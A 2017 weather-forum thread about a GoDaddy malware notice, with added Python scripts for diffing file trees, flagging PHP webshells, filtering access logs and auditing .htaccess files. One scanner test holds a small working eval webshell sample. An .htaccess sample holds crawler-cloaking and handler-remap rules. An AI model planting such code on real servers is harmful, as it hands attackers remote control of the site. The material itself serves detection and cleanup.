WXforum.net

Miscellaneous Debris => Tech Corner => Topic started by: PaulMy on August 24, 2017, 08:36:54 PM

Title: GoDaddy flagged for malware
Post by: PaulMy on August 24, 2017, 08:36:54 PM
I received an email today from GoDaddy which, in part says:
Quote
Our scans flagged your komokaweather.com hosting accounts as containing possible malware.
Please sign in to your hosting account and review the following content and remove or fix the files listed below:

html/.errordocs/missing_bck_old.php

html/j-template/admin/menu/updateMenu.php
(9 more files in Meteotemplate files folder)

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php
html/wsMetNoSA/lang/wsLanguage-en 2_ver1.php
(3 more add on script files in my Saratoga template folder)

Weather28/ewn_frc/js/highcharts.min.js

html/pws-mysql/eq.php
html/pws-mysql/eqfolder/eqlist.php
html/pws/eq.php
html/pws/eqfolder/eqlist.php

and a few more

Call our security experts at 1-866-938-1119 for assistance.
Prevent future infections.
Add GoDaddy Website Security to your site, so this doesn't happen again.
•    Scan and remove malware.
•    Stop malware before it reaches your site.
•    Detect security gaps and back doors before they're exploited.


These files are mostly from my Meteotemplate, Leuven and PWS templates, and some are redundant old versions that I had not removed from my webserver so will be doing that now.

I called GoDaddy to make sure this is a legitimate message and it is.  GoDaddy says they have done a scan, which he said they rarely do, and those files showed up.  I can have them clean the files for a $300 fee and subscribe to their Website Security to avoid this happening in the future.  However they are not telling me at this time that I actually have to do anything.

Anyone experienced this before, or is this a GoDaddy solicitation for their services?

Paul
Title: Re: GoDaddy flagged for malware
Post by: Bushman on August 24, 2017, 09:05:08 PM
IME GoDaddy always tries to get money from you.  Caveat emptor.  (How do you think he pays for the girls??)
Title: Re: GoDaddy flagged for malware
Post by: ValentineWeather on August 24, 2017, 10:23:33 PM
I'm not seeing anything using malwarebytes and Panda while visiting site. They are continually trying to sell or have me upgrade something. I think it's more likely a scam for money, but by GoDaddy. 
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 24, 2017, 10:34:38 PM
The files

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php

May actually *be* malware .. there are no PHP icons in ec-icons, and the _infoold addition to wxLanguage-de-local.php looks suspicious.  You should download those files, zip em up and send to me.. I can take a look.

Also send any Saratoga add-on files that were flagged.  It's possible a miscreant inserted stuff in your site in those files.
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 12:28:28 AM
Thanks Ken, sent PM.

Regards,
Paul
Title: Re: GoDaddy flagged for malware
Post by: wvdkuil on August 25, 2017, 03:53:12 AM
Good morning Paul,

To add to Ken's comments, those files should NOT be on your server and they are "normally" not in the download zip either. I just checked.
wsMetNoSA/lang/wsLanguage-de-local_infoold.php   correct name => wsLanguage-de-local.txt
wsMetNoSA/lang/wsLanguage-en 2_ver1.php  correct name => wsLanguage-en.txt

weather28/ewn_frc/js/highcharts.min.js 
=> the folder ewn-frc/ is not used anymore, as Henkka continually enhances the ewn scripts, so they are run in an iframe now. You can delete the complete folder as they are not relevant for Canadian users.
=> I compared your weather28/..../highcharts.min.js   file with the original distribution, they are identical, so this is a "false positive"

Question 1: can you please give the links to the other "3 more add on script" files? Those are not Saratoga ones, maybe Leuven?

Question 2:
The big question is: How do those files arrive at your sites? Someone is/was uploading those files.
You host multiple websites with different URLs, is only one site flagged or more than one?
If multiple sites are compromised, do you use multiple FTP ID/passwords, one for every site?
Or do you use 1 FTP ID/password for all sites?

Wim
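Wim's comparison of highcharts.min.js against the original distribution generalizes to the whole tree: hash every file in the pristine download and in the deployed copy, then list what was changed and what was never shipped at all. The script below is an added example, not code from Wim or from any of the template authors; the directory layouts and file contents it builds are constructed placeholders, and the data_dirs list is an assumption about which folders should never contain PHP.

```python
"""Compare a deployed web tree against the pristine distribution it was
installed from. Added example for the thread, not code from any template
author. Directory layouts and file contents are constructed for the demo."""
import hashlib
import tempfile
from pathlib import Path


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def manifest(root: Path) -> dict:
    """Relative POSIX path -> sha256 for every regular file under root."""
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_tree(pristine: dict, deployed: dict) -> dict:
    """Classify deployed files against the pristine manifest.

    'unexpected' is the interesting bucket: anything the distribution never
    shipped. 'modified' needs a look too, but local edits to language files
    and config are normal, so it is not a verdict on its own."""
    result = {"identical": [], "modified": [], "missing": [], "unexpected": []}
    for rel, digest in deployed.items():
        if rel not in pristine:
            result["unexpected"].append(rel)
        elif pristine[rel] == digest:
            result["identical"].append(rel)
        else:
            result["modified"].append(rel)
    result["missing"] = sorted(set(pristine) - set(deployed))
    return result


# Assumption: these folder names hold only data or images in the templates,
# so a .php file inside them has no legitimate reason to exist.
DATA_DIRS = ("lang", "ec-icons_gif", "images")


def executable_in_data_dir(rel_paths, data_dirs=DATA_DIRS) -> list:
    """Server-side executable files sitting where only data/images belong."""
    hits = []
    for rel in rel_paths:
        parts = rel.split("/")
        is_php = parts[-1].lower().endswith((".php", ".phtml", ".php5"))
        if is_php and any(d in parts[:-1] for d in data_dirs):
            hits.append(rel)
    return sorted(hits)


def build_demo_trees(base: Path):
    """Constructed layouts mirroring the thread: a clean distribution and a
    deployed copy with two extra files and one locally edited file."""
    clean, site = base / "distribution", base / "deployed"
    files = {
        "wsMetNoSA/lang/wsLanguage-de-local.txt": "de strings\n",
        "wsMetNoSA/lang/wsLanguage-en.txt": "en strings\n",
        "weather28/ewn_frc/js/highcharts.min.js": "/* highcharts */\n",
    }
    for root in (clean, site):
        for rel, body in files.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(body)
    (site / "wsMetNoSA/lang/wsLanguage-de-local_infoold.php").write_text("<?php /* placeholder */ ?>")
    (site / "ec-icons_gif").mkdir()
    (site / "ec-icons_gif/14p60_noversion.php").write_text("<?php /* placeholder */ ?>")
    (site / "wsMetNoSA/lang/wsLanguage-en.txt").write_text("en strings, locally edited\n")
    return clean, site


def run_demo() -> dict:
    with tempfile.TemporaryDirectory() as tmp:
        clean, site = build_demo_trees(Path(tmp))
        report = diff_tree(manifest(clean), manifest(site))
        report["executable_in_data_dir"] = executable_in_data_dir(report["unexpected"])
        return report


if __name__ == "__main__":
    for bucket, paths in run_demo().items():
        print(f"{bucket}: {paths}")
```

In practice you would build the pristine manifest from the unpacked download zip of the same version you installed, and the deployed one from a fresh FTP pull of the site, then read every "unexpected" hit by hand; an identical hash, as with Paul's highcharts.min.js, is what lets you call a flag a false positive with confidence.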
Title: Re: GoDaddy flagged for malware
Post by: CNYWeather on August 25, 2017, 06:01:26 AM
I have gotten the same message from GoDaddy too.

Check those files carefully. There were some image files that had copies renamed with a .php extension injected into my site also. I was flagged and had to remove them all. There were a few from GoDaddy that weren't actually malware when they thought they were. How they keep getting put on my server is a real head scratcher to me.
Title: Re: GoDaddy flagged for malware
Post by: Jáchym on August 25, 2017, 06:28:29 AM
Paul can you please post the 9 links to MT pages?
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 09:23:15 AM
Ken has given a suggestion which I am trying. 
I am a little busy this morning with other things so will be later today before I can get back to @Jachym and @Wim.

Thank you all for your assistance.
Paul
Title: Re: GoDaddy flagged for malware
Post by: SLOweather on August 25, 2017, 09:40:07 AM
I have a water company site hosted on a reseller Godaddy site, and received a similar email a few months ago, without the sales pitch.

They flagged some files that were indeed malware, as well as some legit ones. I copied off the bad ones for reference, and deleted them.


Quote
Anyone experienced this before, or is this a GoDaddy solicitation for their services?

Paul
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 25, 2017, 11:16:33 AM
Quote
The files

html/komokaweather-ca/ec-icons_gif/14p60_noversion.php
html/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php

May actually *be* malware .. there are no PHP icons in ec-icons, and the _infoold addition to wxLanguage-de-local.php looks suspicious.  You should download those files, zip em up and send to me.. I can take a look.

Also send any Saratoga add-on files that were flagged.  It's possible a miscreant inserted stuff in your site in those files.
Yep.. those files are indeed malware - heavily obfuscated, but a remote PHP shell that can process HTTP request arguments into a PHP eval() statement, which causes their remotely-supplied code to be executed on your webserver.  Make note of the date/time stamps on the files, then delete them.  If you have Apache logs containing records from those timestamps, we could look back and see what other mischief has been done by them.
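Ken's description, an obfuscated script that feeds HTTP request arguments into eval(), and his advice to look at the Apache logs around the file timestamps, as an added Python example (not code from Ken or from anyone else in the thread). The "shell" sample is a constructed minimal placeholder in that textbook shape, the log lines are constructed with RFC 5737 documentation addresses, and the indicator regexes are triage heuristics, not a definitive detector.

```python
"""Triage a flagged PHP file and pull the access-log records that touched it.
Added example for the thread; samples and log lines are constructed."""
import re
from datetime import datetime

# Indicator classes for a remote PHP shell: request input, an execution sink,
# and the decoders used to hide the payload. Each is (name, regex).
INDICATORS = [
    ("request_input", re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")),
    ("dynamic_exec", re.compile(r"\b(eval|assert|create_function|preg_replace)\s*\(")),
    ("decoder", re.compile(r"\b(base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(")),
    ("command_exec", re.compile(r"\b(system|shell_exec|passthru|exec|popen)\s*\(")),
    ("variable_function", re.compile(r"\$[A-Za-z_]\w*\s*\(")),  # $f($x): call by name
]


def scan_php(source: str) -> dict:
    """Which indicator classes fire, plus a verdict.

    Request input reaching any execution sink is the shape of the eval()
    shell Ken describes. A decoder alone is not enough; legitimate scripts
    decode base64 too, so that only earns a manual read."""
    hits = {name: bool(rx.search(source)) for name, rx in INDICATORS}
    sinks = hits["dynamic_exec"] or hits["command_exec"] or hits["variable_function"]
    if hits["request_input"] and sinks:
        hits["verdict"] = "likely webshell"
    elif sinks or hits["decoder"]:
        hits["verdict"] = "suspicious, read it"
    else:
        hits["verdict"] = "no indicators"
    return hits


# Constructed placeholder in the textbook eval-shell shape (not a real sample).
SAMPLE_SHELL = """<?php
$k = $_POST['k']; $d = strrev('edoced_46esab');
@eval($d($k));
?>"""

# Constructed stand-in for a harmless template language file.
SAMPLE_LEGIT = """<?php
$lang = array('title' => 'Wetter', 'temp' => 'Temperatur');
echo json_encode($lang);
?>"""

# Apache "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"'
)


def requests_to(log_lines, flagged_paths) -> list:
    """(ip, timestamp, method, path, status) for every record whose request
    path is one of the flagged files, query string ignored. A shell is
    usually driven by POST from one or two IPs with a blank User-Agent."""
    wanted = set(flagged_paths)
    out = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0]
        if path in wanted:
            ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
            out.append((m.group("ip"), ts, m.group("method"), path, int(m.group("status"))))
    return out


# Constructed log lines; addresses are RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [20/Aug/2017:03:14:07 +0000] "GET /komokaweather-ca/index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [20/Aug/2017:03:15:22 +0000] "POST /komokaweather-ca/ec-icons_gif/14p60_noversion.php HTTP/1.1" 200 17 "-" "-"',
    '198.51.100.7 - - [20/Aug/2017:03:15:40 +0000] "POST /komokaweather-ca/ec-icons_gif/14p60_noversion.php?x=1 HTTP/1.1" 200 2210 "-" "-"',
    '203.0.113.5 - - [20/Aug/2017:03:20:01 +0000] "GET /komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php HTTP/1.1" 404 210 "-" "python-requests/2.18"',
]

FLAGGED = [
    "/komokaweather-ca/ec-icons_gif/14p60_noversion.php",
    "/komokaweather-ca/wsMetNoSA/lang/wsLanguage-de-local_infoold.php",
]

if __name__ == "__main__":
    print("shell sample:", scan_php(SAMPLE_SHELL)["verdict"])
    print("lang sample :", scan_php(SAMPLE_LEGIT)["verdict"])
    for ip, ts, method, path, status in requests_to(SAMPLE_LOG, FLAGGED):
        print(ip, ts.isoformat(), method, path, status)
```

Once you have the IPs and times that drove the shell, search the same logs for everything else those IPs did, and for the first request to each flagged path: the record just before it is often the upload that planted the file, which is the answer to Wim's "how did those files arrive" question.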
Title: Re: GoDaddy flagged for malware
Post by: PaulMy on August 25, 2017, 09:20:20 PM
@Wim,
Quote
To add to Ken's comments, those files should NOT be on your server and they are "normally" not in the download zip either. I just checked.
wsMetNoSA/lang/wsLanguage-de-local_infoold.php   correct name => wsLanguage-de-local.txt
wsMetNoSA/lang/wsLanguage-en 2_ver1.php  correct name => wsLanguage-en.txt
I have deleted these.

Quote
weather28/ewn_frc/js/highcharts.min.js 
=> the folder ewn-frc/ is not used anymore, as Henkka continually enhances the ewn scripts, so they are run in an iframe now. You can delete the complete folder as they are not relevant for Canadian users.
=> I compared your weather28/..../highcharts.min.js file with the original distribution, they are identical, so this is a "false positive"
I have deleted this.

Quote
Question 1: can you please give the links to the other "3 more add on script" files? Those are not Saratoga ones, maybe Leuven?
I have sent these to Ken for his review.

Quote
Question 2:
The big question is: How do those files arrive at your sites? Someone is/was uploading those files.
Not by me, and I don't know how. I have only given authority to one person to access my site and that was for a specific /folder about 2 years ago. This person is totally trustworthy.

Quote
You host multiple websites with different URLs, is only one site flagged or more than one?
komokaweather.com is my main hosting and the files GoDaddy listed were all in subfolders
/weather28 for Leuven (only the ewn_frc/js/highlights, and the others in an old weather2 version folder, which I have now deleted)

/komokaweather-ca for Saratoga (four files were listed, and I've sent these to Ken)
/pws for Brian's HomeWeather (17 files listed, but 13 were in old version folders that I have now deleted)
/j-template for Meteotemplate (10 files were listed)
/weather for Cumulus modified template (seven files listed)
/wsMetNoSA for your older MetNo script (one file listed, and now deleted as noted above)
/.errordocs (one file listed - missing_bck_old.php, which I have now deleted)
With the exception of the /j-template and /pws the other files had a date stamp of several years ago.


Quote
If multiple sites are compromised, do you use multiple FTP ID/passwords, one for every site?
Or do you use 1 FTP ID/password for all sites?
I use one FTP ID and password only to my webserver.

@Jachym

Quote
can you please post the 9 links to MT pages?
I will send you an email.

Thank you all for your replies and very helpful suggestions and comments.
Paul

Edit,
I also have two additional domains in my hosting plan for a couple of local not for profit organizations that I maintain and there were no files from these folders on the GoDaddy listing.
Paul
Title: Re: GoDaddy flagged for malware
Post by: Bashy on August 26, 2017, 12:47:32 AM
I find that downloading your site as a backup can kill 2 birds and all that: 1) you have a backup, and 2) you can set Malwarebytes to scan the new backups. I host a few weather sites on my server and the backups are auto-downloaded to 2 drives at home where MB does its thing. This will eliminate any issues quickly; if something is found I will let the client know ASAP.

Periodically downloading your backup instead of leaving it in the hands of your host would pick this up long before now. Plus, you should never rely on your host for the safety of your data anyway.
Title: Re: GoDaddy flagged for malware
Post by: 92merc on August 26, 2017, 12:23:54 PM
I've received 2 emails over the past 6 months from GoDaddy flagging malware.  In the first one, I had something like 8 files flagged.  6 were old and I removed them.  One said my .htaccess file was "infected".  I did some research and took out some entries that weren't needed.  Last one was my Fire Index page.  I left that alone.

Months later, I get another email.  Now it's totally different files.  A few I deleted again as they weren't needed from a sub domain I have.  But my original Fire Index file didn't show up this time even though I hadn't changed it.

After the first email, I did get a call.  I got the impression they wanted to sell me something.  I just told the guy I deleted all those files and he shut up.  Never got a second call.
Title: Re: GoDaddy flagged for malware
Post by: saratogaWX on August 26, 2017, 01:55:44 PM
You may have a lurking malware script from an earlier successful compromise on your site, and that's how they got in again.

Title: Re: GoDaddy flagged for malware
Post by: dasman on August 29, 2017, 11:37:04 PM
I got the same email last Thursday from GoDaddy. They flagged 16 files. After looking through them 13 were indeed malware. Also the .htaccess file was compromised.  I too got the sales pitch. All 13 files are deleted, and the .htaccess file is restored. However on Google my index page is tagged with Viagra and another page with Cialis. I need the Google bot to recrawl the site. :-(
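dasman's and 92merc's compromised .htaccess files, together with the Viagra/Cialis text Google shows for dasman's index page, fit the usual .htaccess cloaking pattern: crawlers are redirected to pharma spam while the owner in a normal browser sees the site as usual, and an AddHandler line can make the renamed-image .php files CNYWeather mentions executable. The check below is an added example, not anything posted in the thread; the two .htaccess bodies are constructed, and the directive patterns are assumptions drawn from common compromises, so treat a hit as something to read by hand rather than proof.

```python
"""Audit an .htaccess for the directives used to cloak spam for crawlers or
to make non-PHP files executable. Added example for the thread; both
.htaccess bodies are constructed and the rule set is heuristic."""
import re

CHECKS = [
    # Conditional rewrite keyed on a search-engine User-Agent or Referer:
    # the classic pharma cloak (crawler gets spam, owner gets the real page).
    ("crawler_cloaking", re.compile(
        r"RewriteCond\s+%\{HTTP_(USER_AGENT|REFERER)\}\s+.*\b(google|bing|yahoo|msn|yandex|baidu)",
        re.I)),
    # Mapping image or text extensions to the PHP handler, so a .gif or .jpg
    # dropped into an icons folder runs as code.
    ("handler_remap", re.compile(
        r"^\s*(AddHandler|AddType|SetHandler)\s+\S*php\S*\s+.*\.(jpe?g|gif|png|txt|ico)",
        re.I | re.M)),
    # Silently including a script in every PHP request on the account.
    ("auto_prepend", re.compile(r"php_value\s+auto_(prepend|append)_file", re.I)),
    # Rewrite target on another host.
    ("external_redirect", re.compile(r"Rewrite(Rule|Cond).*https?://", re.I)),
]


def audit_htaccess(text: str) -> list:
    """Names of the checks that fire, in CHECKS order; empty means clean."""
    return [name for name, rx in CHECKS if rx.search(text)]


# Constructed: the kind of .htaccess a weather template site normally has.
CLEAN = """# hide directory listings and set custom error pages
Options -Indexes
ErrorDocument 404 /.errordocs/missing.html
"""

# Constructed: the same file with a crawler cloak and a handler remap added.
TAMPERED = """Options -Indexes
ErrorDocument 404 /.errordocs/missing.html
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot) [NC]
RewriteRule ^(.*)$ http://example.invalid/pharma.php?q=$1 [L,R=302]
AddHandler application/x-httpd-php .gif .jpg
"""

if __name__ == "__main__":
    print("clean   :", audit_htaccess(CLEAN) or "no findings")
    print("tampered:", audit_htaccess(TAMPERED) or "no findings")
```

Because the cloak only fires for crawler User-Agents, visiting the site yourself, as ValentineWeather did, shows nothing; fetching the index with a Googlebot User-Agent string (curl -A) reproduces what Google indexed. After restoring the file, Google Search Console's URL inspection is the fastest way to get the page recrawled.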
Title: Re: GoDaddy flagged for malware
Post by: Bushman on August 30, 2017, 12:37:44 AM
How are all these sites being compromised?
Title: Re: GoDaddy flagged for malware
Post by: Bashy on August 30, 2017, 12:40:30 AM
Probably many scripts used and some are outdated.